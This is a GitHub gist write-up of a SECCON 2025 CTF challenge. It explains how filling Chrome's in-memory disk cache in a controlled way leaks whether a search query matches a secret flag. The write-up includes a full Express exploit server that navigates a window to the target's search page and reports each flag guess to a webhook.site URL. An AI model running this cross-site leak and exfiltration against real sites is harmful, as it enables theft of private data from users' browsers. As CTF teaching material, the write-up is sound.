Skip to content

Instantly share code, notes, and snippets.

@parrot409
Last active December 30, 2025 06:29
Show Gist options
  • Select an option

  • Save parrot409/e3b546d3b76e9f9044d22456e4cc8622 to your computer and use it in GitHub Desktop.

Select an option

Save parrot409/e3b546d3b76e9f9044d22456e4cc8622 to your computer and use it in GitHub Desktop.
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache but how does chrome handle this? I deduced that it uses in-memory disk cache and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to cache miss in incognito mode but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
<script>
(async _=>{
   for(let i=0;i<20;i++) await fetch('/chunk?'+i)
   try {
       for(let i=0;i<20;i++) await fetch('/chunk?'+i,{cache:'only-if-cached',mode:'same-origin'})
   } catch(e){ alert('not cached') }
})()
</script>
EOF
$ python3 -m http.server 2000

The exploit uses the following strategy:

  • push 1 entry of size 1b
  • push 49 entries of size 1mb
  • push 599 entries of size 1kb
  • push //challenge.com/search?query=SECCON&i for i from 0 to 200 with window.location
  • query the disk cache to see if the first entry we pushed is purged

We essentially "groom" the disk cache so that there's room for 200 entries from failed queries, but not enough room for 200 entries from successful queries.

The search page size is 433 bytes for a failed query and 433 + flag.length bytes when the query matches part of the flag. This creates a size difference of flag.length * 200 bytes between bad and good searches. For a flag length of 24, this is about 5KB. A larger gap makes the detection less error prone.

We can tell whether the cache was filled by a successful query by probing the first inserted 1 byte entry. When the cache limit is reached, the first entry gets evicted. Note that I think Chromium's eviction logic is more complex. in my testing it kept evicting the oldest entry once the limit is hit.

I believe this technique can be reused against xsleaks search challenges where caching is not disabled on the search page. The downside is that it leaks only one state per run. It may be possible to perform multiple queries by clearing the cache or using a similar reset mechanism.

const express = require("express");
const app = express();
const port = 3008;
app.use(express.json());
app.get("/gg", (req, res) => {
res.send(`A`.repeat((1*1024*1024)))
});
app.get("/rr", (req, res) => {
res.send(`A`.repeat(1))
});
app.get("/vaaa", (req, res) => {
console.log(req.query)
res.send(`A`.repeat(1024))
});
app.get("/", (req, res) => {
if(!req.query.prefix || !req.query.check) return res.send('no')
console.log('bot')
res.send(`
<script>
let x = window.open()
const flag = '${req.query.prefix}'
const check = '${req.query.check}'
async function df(){
console.log('doing')
await fetch('/rr',{cache:'force-cache'})
for(i=0;i<49;i++) fetch('http://xxx.xx.xxx.xx:5000/gg?'+i+'&'+'A'.repeat(52-flag.length),{cache:'force-cache'})
for(i=0;i<599;i++) fetch('http://xxx.xx.xxx.xx:5000/vaaa?'+i+'&'+'A'.repeat(52-flag.length),{cache:'force-cache'})
await new Promise(r => setTimeout(r, 10000)); // sleeps for 1 second
for(i=0;i<200;i++){
let u = 'http://web:3000/?query='+flag+check+'&'+i+'&'
x.location = u.padEnd(87,'A')
await new Promise(r => setTimeout(r, 30)); // sleeps for 1 second
}
try{
await fetch('/rr',{cache: 'only-if-cached', mode: 'same-origin' })
fetch('https://webhook.site/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?not-correct-${req.query.prefix+req.query.check}')
} catch(e){
fetch('https://webhook.site/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?found-${req.query.prefix+req.query.check}')
}
console.log('done')
}
df()
</script>
`)
});
app.listen(5000)
@Privitorta
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment